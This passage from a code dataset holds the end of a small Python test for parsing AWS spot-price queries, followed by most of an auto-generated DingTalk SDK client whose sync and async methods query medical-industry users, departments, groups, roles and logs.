bi3.16xlarge\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # noqa: E501
q = AbiQuery.get_query_from_data(query_data)
print(q)
assert isinstance(q, AwsSpotPrice)
assert q.zone == "us-east-1f"
assert q.instance == "i3.16xlarge"
| 76.807692 | 1,335 | 0.736104 | 424 | 1,997 | 3.415094 | 0.091981 | 1.259669 | 1.845994 | 2.403315 | 0.729972 | 0.683011 | 0.648481 | 0.648481 | 0.648481 | 0.648481 | 0 | 0.344864 | 0.059089 | 1,997 | 25 | 1,336 | 79.88 | 0.425758 | 0.005008 | 0 | 0 | 0 | 0.055556 | 0.687154 | 0.655416 | 0 | 1 | 0 | 0 | 0.333333 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.222222 | 0.222222 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
29b9dfcbaf8646c19101e3ef14362a7077a089d5 | 49,756 | py | Python | dingtalk/python/alibabacloud_dingtalk/industry_1_0/client.py | yndu13/dingtalk-sdk | 700fb7bb49c4d3167f84afc5fcb5e7aa5a09735f | [
"Apache-2.0"
] | null | null | null | dingtalk/python/alibabacloud_dingtalk/industry_1_0/client.py | yndu13/dingtalk-sdk | 700fb7bb49c4d3167f84afc5fcb5e7aa5a09735f | [
"Apache-2.0"
] | null | null | null | dingtalk/python/alibabacloud_dingtalk/industry_1_0/client.py | yndu13/dingtalk-sdk | 700fb7bb49c4d3167f84afc5fcb5e7aa5a09735f | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# This file is auto-generated, don't edit it. Thanks.
from Tea.core import TeaCore
from alibabacloud_tea_openapi.client import Client as OpenApiClient
from alibabacloud_tea_openapi import models as open_api_models
from alibabacloud_tea_util.client import Client as UtilClient
from alibabacloud_dingtalk.industry_1_0 import models as dingtalkindustry__1__0_models
from alibabacloud_tea_util import models as util_models
from alibabacloud_openapi_util.client import Client as OpenApiUtilClient
class Client(OpenApiClient):
"""
*\
"""
def __init__(
    self,
    config: open_api_models.Config,
):
    """Initialize the client; defaults the endpoint to api.dingtalk.com when unset."""
    super().__init__(config)
    self._endpoint_rule = ''
    # Fall back to the public DingTalk gateway if the caller gave no endpoint.
    if UtilClient.empty(self._endpoint):
        self._endpoint = 'api.dingtalk.com'
def query_user_info(
    self,
    user_id: str,
) -> dingtalkindustry__1__0_models.QueryUserInfoResponse:
    """Query a medical-industry user's info; delegates to the *_with_options variant with default headers/runtime."""
    runtime = util_models.RuntimeOptions()
    headers = dingtalkindustry__1__0_models.QueryUserInfoHeaders()
    return self.query_user_info_with_options(user_id, headers, runtime)
async def query_user_info_async(
    self,
    user_id: str,
) -> dingtalkindustry__1__0_models.QueryUserInfoResponse:
    """Async variant of query_user_info with default headers/runtime."""
    runtime = util_models.RuntimeOptions()
    headers = dingtalkindustry__1__0_models.QueryUserInfoHeaders()
    return await self.query_user_info_with_options_async(user_id, headers, runtime)
def query_user_info_with_options(
    self,
    user_id: str,
    headers: dingtalkindustry__1__0_models.QueryUserInfoHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryUserInfoResponse:
    """GET /v1.0/industry/medicals/users/{user_id} with caller-supplied headers and runtime options."""
    real_headers = {}
    if not UtilClient.is_unset(headers.common_headers):
        real_headers = headers.common_headers
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        # Propagate the DingTalk access token as an HTTP header.
        real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    req = open_api_models.OpenApiRequest(
        headers=real_headers
    )
    # Deserialize the raw ROA response into the typed response model.
    return TeaCore.from_map(
        dingtalkindustry__1__0_models.QueryUserInfoResponse(),
        self.do_roarequest('QueryUserInfo', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/users/{user_id}', 'json', req, runtime)
    )
async def query_user_info_with_options_async(
    self,
    user_id: str,
    headers: dingtalkindustry__1__0_models.QueryUserInfoHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryUserInfoResponse:
    """Async GET /v1.0/industry/medicals/users/{user_id} with caller-supplied headers and runtime options."""
    real_headers = {}
    if not UtilClient.is_unset(headers.common_headers):
        real_headers = headers.common_headers
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        # Propagate the DingTalk access token as an HTTP header.
        real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    req = open_api_models.OpenApiRequest(
        headers=real_headers
    )
    return TeaCore.from_map(
        dingtalkindustry__1__0_models.QueryUserInfoResponse(),
        await self.do_roarequest_async('QueryUserInfo', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/users/{user_id}', 'json', req, runtime)
    )
def query_all_member_by_dept(
    self,
    dept_id: str,
    request: dingtalkindustry__1__0_models.QueryAllMemberByDeptRequest,
) -> dingtalkindustry__1__0_models.QueryAllMemberByDeptResponse:
    """List members of a department (paged via request); delegates with default headers/runtime."""
    runtime = util_models.RuntimeOptions()
    headers = dingtalkindustry__1__0_models.QueryAllMemberByDeptHeaders()
    return self.query_all_member_by_dept_with_options(dept_id, request, headers, runtime)
async def query_all_member_by_dept_async(
    self,
    dept_id: str,
    request: dingtalkindustry__1__0_models.QueryAllMemberByDeptRequest,
) -> dingtalkindustry__1__0_models.QueryAllMemberByDeptResponse:
    """Async variant of query_all_member_by_dept with default headers/runtime."""
    runtime = util_models.RuntimeOptions()
    headers = dingtalkindustry__1__0_models.QueryAllMemberByDeptHeaders()
    return await self.query_all_member_by_dept_with_options_async(dept_id, request, headers, runtime)
def query_all_member_by_dept_with_options(
    self,
    dept_id: str,
    request: dingtalkindustry__1__0_models.QueryAllMemberByDeptRequest,
    headers: dingtalkindustry__1__0_models.QueryAllMemberByDeptHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryAllMemberByDeptResponse:
    """GET /v1.0/industry/medicals/departments/{dept_id}/members; pageSize/pageNumber come from *request*."""
    UtilClient.validate_model(request)
    # Only forward pagination parameters that were actually set.
    query = {}
    if not UtilClient.is_unset(request.page_size):
        query['pageSize'] = request.page_size
    if not UtilClient.is_unset(request.page_number):
        query['pageNumber'] = request.page_number
    real_headers = {}
    if not UtilClient.is_unset(headers.common_headers):
        real_headers = headers.common_headers
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    req = open_api_models.OpenApiRequest(
        headers=real_headers,
        query=OpenApiUtilClient.query(query)
    )
    return TeaCore.from_map(
        dingtalkindustry__1__0_models.QueryAllMemberByDeptResponse(),
        self.do_roarequest('QueryAllMemberByDept', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/departments/{dept_id}/members', 'json', req, runtime)
    )
async def query_all_member_by_dept_with_options_async(
    self,
    dept_id: str,
    request: dingtalkindustry__1__0_models.QueryAllMemberByDeptRequest,
    headers: dingtalkindustry__1__0_models.QueryAllMemberByDeptHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryAllMemberByDeptResponse:
    """Async GET /v1.0/industry/medicals/departments/{dept_id}/members; pageSize/pageNumber come from *request*."""
    UtilClient.validate_model(request)
    query = {}
    if not UtilClient.is_unset(request.page_size):
        query['pageSize'] = request.page_size
    if not UtilClient.is_unset(request.page_number):
        query['pageNumber'] = request.page_number
    real_headers = {}
    if not UtilClient.is_unset(headers.common_headers):
        real_headers = headers.common_headers
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    req = open_api_models.OpenApiRequest(
        headers=real_headers,
        query=OpenApiUtilClient.query(query)
    )
    return TeaCore.from_map(
        dingtalkindustry__1__0_models.QueryAllMemberByDeptResponse(),
        await self.do_roarequest_async('QueryAllMemberByDept', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/departments/{dept_id}/members', 'json', req, runtime)
    )
def query_all_member_by_group(
    self,
    group_id: str,
    request: dingtalkindustry__1__0_models.QueryAllMemberByGroupRequest,
) -> dingtalkindustry__1__0_models.QueryAllMemberByGroupResponse:
    """List members of a group (paged via request); delegates with default headers/runtime."""
    runtime = util_models.RuntimeOptions()
    headers = dingtalkindustry__1__0_models.QueryAllMemberByGroupHeaders()
    return self.query_all_member_by_group_with_options(group_id, request, headers, runtime)
async def query_all_member_by_group_async(
    self,
    group_id: str,
    request: dingtalkindustry__1__0_models.QueryAllMemberByGroupRequest,
) -> dingtalkindustry__1__0_models.QueryAllMemberByGroupResponse:
    """Async variant of query_all_member_by_group with default headers/runtime."""
    runtime = util_models.RuntimeOptions()
    headers = dingtalkindustry__1__0_models.QueryAllMemberByGroupHeaders()
    return await self.query_all_member_by_group_with_options_async(group_id, request, headers, runtime)
def query_all_member_by_group_with_options(
    self,
    group_id: str,
    request: dingtalkindustry__1__0_models.QueryAllMemberByGroupRequest,
    headers: dingtalkindustry__1__0_models.QueryAllMemberByGroupHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryAllMemberByGroupResponse:
    """GET /v1.0/industry/medicals/groups/{group_id}/members; pageSize/pageNumber come from *request*."""
    UtilClient.validate_model(request)
    query = {}
    if not UtilClient.is_unset(request.page_size):
        query['pageSize'] = request.page_size
    if not UtilClient.is_unset(request.page_number):
        query['pageNumber'] = request.page_number
    real_headers = {}
    if not UtilClient.is_unset(headers.common_headers):
        real_headers = headers.common_headers
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    req = open_api_models.OpenApiRequest(
        headers=real_headers,
        query=OpenApiUtilClient.query(query)
    )
    return TeaCore.from_map(
        dingtalkindustry__1__0_models.QueryAllMemberByGroupResponse(),
        self.do_roarequest('QueryAllMemberByGroup', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/groups/{group_id}/members', 'json', req, runtime)
    )
async def query_all_member_by_group_with_options_async(
    self,
    group_id: str,
    request: dingtalkindustry__1__0_models.QueryAllMemberByGroupRequest,
    headers: dingtalkindustry__1__0_models.QueryAllMemberByGroupHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryAllMemberByGroupResponse:
    """Async GET /v1.0/industry/medicals/groups/{group_id}/members; pageSize/pageNumber come from *request*."""
    UtilClient.validate_model(request)
    query = {}
    if not UtilClient.is_unset(request.page_size):
        query['pageSize'] = request.page_size
    if not UtilClient.is_unset(request.page_number):
        query['pageNumber'] = request.page_number
    real_headers = {}
    if not UtilClient.is_unset(headers.common_headers):
        real_headers = headers.common_headers
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    req = open_api_models.OpenApiRequest(
        headers=real_headers,
        query=OpenApiUtilClient.query(query)
    )
    return TeaCore.from_map(
        dingtalkindustry__1__0_models.QueryAllMemberByGroupResponse(),
        await self.do_roarequest_async('QueryAllMemberByGroup', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/groups/{group_id}/members', 'json', req, runtime)
    )
def query_user_roles(
    self,
    user_id: str,
) -> dingtalkindustry__1__0_models.QueryUserRolesResponse:
    """Query the roles of a user; delegates with default headers/runtime."""
    runtime = util_models.RuntimeOptions()
    headers = dingtalkindustry__1__0_models.QueryUserRolesHeaders()
    return self.query_user_roles_with_options(user_id, headers, runtime)
async def query_user_roles_async(
    self,
    user_id: str,
) -> dingtalkindustry__1__0_models.QueryUserRolesResponse:
    """Async variant of query_user_roles with default headers/runtime."""
    runtime = util_models.RuntimeOptions()
    headers = dingtalkindustry__1__0_models.QueryUserRolesHeaders()
    return await self.query_user_roles_with_options_async(user_id, headers, runtime)
def query_user_roles_with_options(
    self,
    user_id: str,
    headers: dingtalkindustry__1__0_models.QueryUserRolesHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryUserRolesResponse:
    """GET /v1.0/industry/medicals/users/{user_id}/roles with caller-supplied headers and runtime options."""
    real_headers = {}
    if not UtilClient.is_unset(headers.common_headers):
        real_headers = headers.common_headers
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    req = open_api_models.OpenApiRequest(
        headers=real_headers
    )
    return TeaCore.from_map(
        dingtalkindustry__1__0_models.QueryUserRolesResponse(),
        self.do_roarequest('QueryUserRoles', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/users/{user_id}/roles', 'json', req, runtime)
    )
async def query_user_roles_with_options_async(
    self,
    user_id: str,
    headers: dingtalkindustry__1__0_models.QueryUserRolesHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryUserRolesResponse:
    """Async GET /v1.0/industry/medicals/users/{user_id}/roles with caller-supplied headers and runtime options."""
    real_headers = {}
    if not UtilClient.is_unset(headers.common_headers):
        real_headers = headers.common_headers
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    req = open_api_models.OpenApiRequest(
        headers=real_headers
    )
    return TeaCore.from_map(
        dingtalkindustry__1__0_models.QueryUserRolesResponse(),
        await self.do_roarequest_async('QueryUserRoles', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/users/{user_id}/roles', 'json', req, runtime)
    )
def query_all_group(
    self,
    request: dingtalkindustry__1__0_models.QueryAllGroupRequest,
) -> dingtalkindustry__1__0_models.QueryAllGroupResponse:
    """List all groups (paged via request); delegates with default headers/runtime."""
    runtime = util_models.RuntimeOptions()
    headers = dingtalkindustry__1__0_models.QueryAllGroupHeaders()
    return self.query_all_group_with_options(request, headers, runtime)
async def query_all_group_async(
    self,
    request: dingtalkindustry__1__0_models.QueryAllGroupRequest,
) -> dingtalkindustry__1__0_models.QueryAllGroupResponse:
    """Async variant of query_all_group with default headers/runtime."""
    runtime = util_models.RuntimeOptions()
    headers = dingtalkindustry__1__0_models.QueryAllGroupHeaders()
    return await self.query_all_group_with_options_async(request, headers, runtime)
def query_all_group_with_options(
    self,
    request: dingtalkindustry__1__0_models.QueryAllGroupRequest,
    headers: dingtalkindustry__1__0_models.QueryAllGroupHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryAllGroupResponse:
    """GET /v1.0/industry/medicals/groups; pageSize/pageNumber come from *request*."""
    UtilClient.validate_model(request)
    query = {}
    if not UtilClient.is_unset(request.page_size):
        query['pageSize'] = request.page_size
    if not UtilClient.is_unset(request.page_number):
        query['pageNumber'] = request.page_number
    real_headers = {}
    if not UtilClient.is_unset(headers.common_headers):
        real_headers = headers.common_headers
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    req = open_api_models.OpenApiRequest(
        headers=real_headers,
        query=OpenApiUtilClient.query(query)
    )
    return TeaCore.from_map(
        dingtalkindustry__1__0_models.QueryAllGroupResponse(),
        self.do_roarequest('QueryAllGroup', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/groups', 'json', req, runtime)
    )
async def query_all_group_with_options_async(
    self,
    request: dingtalkindustry__1__0_models.QueryAllGroupRequest,
    headers: dingtalkindustry__1__0_models.QueryAllGroupHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryAllGroupResponse:
    """Async GET /v1.0/industry/medicals/groups; pageSize/pageNumber come from *request*."""
    UtilClient.validate_model(request)
    query = {}
    if not UtilClient.is_unset(request.page_size):
        query['pageSize'] = request.page_size
    if not UtilClient.is_unset(request.page_number):
        query['pageNumber'] = request.page_number
    real_headers = {}
    if not UtilClient.is_unset(headers.common_headers):
        real_headers = headers.common_headers
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    req = open_api_models.OpenApiRequest(
        headers=real_headers,
        query=OpenApiUtilClient.query(query)
    )
    return TeaCore.from_map(
        dingtalkindustry__1__0_models.QueryAllGroupResponse(),
        await self.do_roarequest_async('QueryAllGroup', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/groups', 'json', req, runtime)
    )
def query_all_groups_in_dept(
    self,
    dept_id: str,
    request: dingtalkindustry__1__0_models.QueryAllGroupsInDeptRequest,
) -> dingtalkindustry__1__0_models.QueryAllGroupsInDeptResponse:
    """List groups under a department (paged via request); delegates with default headers/runtime."""
    runtime = util_models.RuntimeOptions()
    headers = dingtalkindustry__1__0_models.QueryAllGroupsInDeptHeaders()
    return self.query_all_groups_in_dept_with_options(dept_id, request, headers, runtime)
async def query_all_groups_in_dept_async(
    self,
    dept_id: str,
    request: dingtalkindustry__1__0_models.QueryAllGroupsInDeptRequest,
) -> dingtalkindustry__1__0_models.QueryAllGroupsInDeptResponse:
    """Async variant of query_all_groups_in_dept with default headers/runtime."""
    runtime = util_models.RuntimeOptions()
    headers = dingtalkindustry__1__0_models.QueryAllGroupsInDeptHeaders()
    return await self.query_all_groups_in_dept_with_options_async(dept_id, request, headers, runtime)
def query_all_groups_in_dept_with_options(
    self,
    dept_id: str,
    request: dingtalkindustry__1__0_models.QueryAllGroupsInDeptRequest,
    headers: dingtalkindustry__1__0_models.QueryAllGroupsInDeptHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryAllGroupsInDeptResponse:
    """GET /v1.0/industry/medicals/departments/{dept_id}/groups; pageSize/pageNumber come from *request*."""
    UtilClient.validate_model(request)
    query = {}
    if not UtilClient.is_unset(request.page_size):
        query['pageSize'] = request.page_size
    if not UtilClient.is_unset(request.page_number):
        query['pageNumber'] = request.page_number
    real_headers = {}
    if not UtilClient.is_unset(headers.common_headers):
        real_headers = headers.common_headers
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    req = open_api_models.OpenApiRequest(
        headers=real_headers,
        query=OpenApiUtilClient.query(query)
    )
    return TeaCore.from_map(
        dingtalkindustry__1__0_models.QueryAllGroupsInDeptResponse(),
        self.do_roarequest('QueryAllGroupsInDept', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/departments/{dept_id}/groups', 'json', req, runtime)
    )
async def query_all_groups_in_dept_with_options_async(
    self,
    dept_id: str,
    request: dingtalkindustry__1__0_models.QueryAllGroupsInDeptRequest,
    headers: dingtalkindustry__1__0_models.QueryAllGroupsInDeptHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryAllGroupsInDeptResponse:
    """Async GET /v1.0/industry/medicals/departments/{dept_id}/groups; pageSize/pageNumber come from *request*."""
    UtilClient.validate_model(request)
    query = {}
    if not UtilClient.is_unset(request.page_size):
        query['pageSize'] = request.page_size
    if not UtilClient.is_unset(request.page_number):
        query['pageNumber'] = request.page_number
    real_headers = {}
    if not UtilClient.is_unset(headers.common_headers):
        real_headers = headers.common_headers
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    req = open_api_models.OpenApiRequest(
        headers=real_headers,
        query=OpenApiUtilClient.query(query)
    )
    return TeaCore.from_map(
        dingtalkindustry__1__0_models.QueryAllGroupsInDeptResponse(),
        await self.do_roarequest_async('QueryAllGroupsInDept', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/departments/{dept_id}/groups', 'json', req, runtime)
    )
def query_biz_opt_log(
    self,
    request: dingtalkindustry__1__0_models.QueryBizOptLogRequest,
) -> dingtalkindustry__1__0_models.QueryBizOptLogResponse:
    """Query business operation logs (cursor-paged via request); delegates with default headers/runtime."""
    runtime = util_models.RuntimeOptions()
    headers = dingtalkindustry__1__0_models.QueryBizOptLogHeaders()
    return self.query_biz_opt_log_with_options(request, headers, runtime)
async def query_biz_opt_log_async(
    self,
    request: dingtalkindustry__1__0_models.QueryBizOptLogRequest,
) -> dingtalkindustry__1__0_models.QueryBizOptLogResponse:
    """Async variant of query_biz_opt_log with default headers/runtime."""
    runtime = util_models.RuntimeOptions()
    headers = dingtalkindustry__1__0_models.QueryBizOptLogHeaders()
    return await self.query_biz_opt_log_with_options_async(request, headers, runtime)
def query_biz_opt_log_with_options(
    self,
    request: dingtalkindustry__1__0_models.QueryBizOptLogRequest,
    headers: dingtalkindustry__1__0_models.QueryBizOptLogHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryBizOptLogResponse:
    """GET /v1.0/industry/medicals/bizOptLogs; cursor pagination via request.next_token/max_results."""
    UtilClient.validate_model(request)
    query = {}
    if not UtilClient.is_unset(request.next_token):
        query['nextToken'] = request.next_token
    if not UtilClient.is_unset(request.max_results):
        query['maxResults'] = request.max_results
    real_headers = {}
    if not UtilClient.is_unset(headers.common_headers):
        real_headers = headers.common_headers
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    req = open_api_models.OpenApiRequest(
        headers=real_headers,
        query=OpenApiUtilClient.query(query)
    )
    return TeaCore.from_map(
        dingtalkindustry__1__0_models.QueryBizOptLogResponse(),
        self.do_roarequest('QueryBizOptLog', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/bizOptLogs', 'json', req, runtime)
    )
async def query_biz_opt_log_with_options_async(
    self,
    request: dingtalkindustry__1__0_models.QueryBizOptLogRequest,
    headers: dingtalkindustry__1__0_models.QueryBizOptLogHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryBizOptLogResponse:
    """Async GET /v1.0/industry/medicals/bizOptLogs; cursor pagination via request.next_token/max_results."""
    UtilClient.validate_model(request)
    query = {}
    if not UtilClient.is_unset(request.next_token):
        query['nextToken'] = request.next_token
    if not UtilClient.is_unset(request.max_results):
        query['maxResults'] = request.max_results
    real_headers = {}
    if not UtilClient.is_unset(headers.common_headers):
        real_headers = headers.common_headers
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    req = open_api_models.OpenApiRequest(
        headers=real_headers,
        query=OpenApiUtilClient.query(query)
    )
    return TeaCore.from_map(
        dingtalkindustry__1__0_models.QueryBizOptLogResponse(),
        await self.do_roarequest_async('QueryBizOptLog', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/bizOptLogs', 'json', req, runtime)
    )
def query_user_prob_code_dictionary(self) -> dingtalkindustry__1__0_models.QueryUserProbCodeDictionaryResponse:
    """Fetch the user problem-code dictionary; delegates with default headers/runtime."""
    runtime = util_models.RuntimeOptions()
    headers = dingtalkindustry__1__0_models.QueryUserProbCodeDictionaryHeaders()
    return self.query_user_prob_code_dictionary_with_options(headers, runtime)
async def query_user_prob_code_dictionary_async(self) -> dingtalkindustry__1__0_models.QueryUserProbCodeDictionaryResponse:
    """Async variant of query_user_prob_code_dictionary with default headers/runtime."""
    runtime = util_models.RuntimeOptions()
    headers = dingtalkindustry__1__0_models.QueryUserProbCodeDictionaryHeaders()
    return await self.query_user_prob_code_dictionary_with_options_async(headers, runtime)
def query_user_prob_code_dictionary_with_options(
    self,
    headers: dingtalkindustry__1__0_models.QueryUserProbCodeDictionaryHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryUserProbCodeDictionaryResponse:
    """GET /v1.0/industry/medicals/userProbCodes with caller-supplied headers and runtime options."""
    real_headers = {}
    if not UtilClient.is_unset(headers.common_headers):
        real_headers = headers.common_headers
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    req = open_api_models.OpenApiRequest(
        headers=real_headers
    )
    return TeaCore.from_map(
        dingtalkindustry__1__0_models.QueryUserProbCodeDictionaryResponse(),
        self.do_roarequest('QueryUserProbCodeDictionary', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/userProbCodes', 'json', req, runtime)
    )
async def query_user_prob_code_dictionary_with_options_async(
    self,
    headers: dingtalkindustry__1__0_models.QueryUserProbCodeDictionaryHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryUserProbCodeDictionaryResponse:
    """Async GET /v1.0/industry/medicals/userProbCodes with caller-supplied headers and runtime options."""
    real_headers = {}
    if not UtilClient.is_unset(headers.common_headers):
        real_headers = headers.common_headers
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    req = open_api_models.OpenApiRequest(
        headers=real_headers
    )
    return TeaCore.from_map(
        dingtalkindustry__1__0_models.QueryUserProbCodeDictionaryResponse(),
        await self.do_roarequest_async('QueryUserProbCodeDictionary', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/userProbCodes', 'json', req, runtime)
    )
def query_job_status_code_dictionary(self) -> dingtalkindustry__1__0_models.QueryJobStatusCodeDictionaryResponse:
    """Fetch the job status-code dictionary; delegates with default headers/runtime."""
    runtime = util_models.RuntimeOptions()
    headers = dingtalkindustry__1__0_models.QueryJobStatusCodeDictionaryHeaders()
    return self.query_job_status_code_dictionary_with_options(headers, runtime)
async def query_job_status_code_dictionary_async(self) -> dingtalkindustry__1__0_models.QueryJobStatusCodeDictionaryResponse:
    """Async variant of query_job_status_code_dictionary with default headers/runtime."""
    runtime = util_models.RuntimeOptions()
    headers = dingtalkindustry__1__0_models.QueryJobStatusCodeDictionaryHeaders()
    return await self.query_job_status_code_dictionary_with_options_async(headers, runtime)
def query_job_status_code_dictionary_with_options(
    self,
    headers: dingtalkindustry__1__0_models.QueryJobStatusCodeDictionaryHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryJobStatusCodeDictionaryResponse:
    """GET the job-status code dictionary, honoring caller-supplied headers."""
    hdrs = headers.common_headers if not UtilClient.is_unset(headers.common_headers) else {}
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        hdrs['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    api_req = open_api_models.OpenApiRequest(headers=hdrs)
    response_model = dingtalkindustry__1__0_models.QueryJobStatusCodeDictionaryResponse()
    raw = self.do_roarequest('QueryJobStatusCodeDictionary', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/jobStatusCodes', 'json', api_req, runtime)
    return TeaCore.from_map(response_model, raw)
async def query_job_status_code_dictionary_with_options_async(
    self,
    headers: dingtalkindustry__1__0_models.QueryJobStatusCodeDictionaryHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryJobStatusCodeDictionaryResponse:
    """Asynchronously GET the job-status code dictionary with explicit headers/runtime."""
    hdrs = headers.common_headers if not UtilClient.is_unset(headers.common_headers) else {}
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        hdrs['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    api_req = open_api_models.OpenApiRequest(headers=hdrs)
    response_model = dingtalkindustry__1__0_models.QueryJobStatusCodeDictionaryResponse()
    raw = await self.do_roarequest_async('QueryJobStatusCodeDictionary', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/jobStatusCodes', 'json', api_req, runtime)
    return TeaCore.from_map(response_model, raw)
def query_department_info(
    self,
    dept_id: str,
) -> dingtalkindustry__1__0_models.QueryDepartmentInfoResponse:
    """Query one medical department by id using default headers and runtime options."""
    run_opts = util_models.RuntimeOptions()
    default_headers = dingtalkindustry__1__0_models.QueryDepartmentInfoHeaders()
    return self.query_department_info_with_options(dept_id, default_headers, run_opts)
async def query_department_info_async(
    self,
    dept_id: str,
) -> dingtalkindustry__1__0_models.QueryDepartmentInfoResponse:
    """Async variant of :meth:`query_department_info` with default options."""
    run_opts = util_models.RuntimeOptions()
    default_headers = dingtalkindustry__1__0_models.QueryDepartmentInfoHeaders()
    return await self.query_department_info_with_options_async(dept_id, default_headers, run_opts)
def query_department_info_with_options(
    self,
    dept_id: str,
    headers: dingtalkindustry__1__0_models.QueryDepartmentInfoHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryDepartmentInfoResponse:
    """GET one department (path parameter ``dept_id``), honoring caller-supplied headers."""
    hdrs = headers.common_headers if not UtilClient.is_unset(headers.common_headers) else {}
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        hdrs['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    api_req = open_api_models.OpenApiRequest(headers=hdrs)
    response_model = dingtalkindustry__1__0_models.QueryDepartmentInfoResponse()
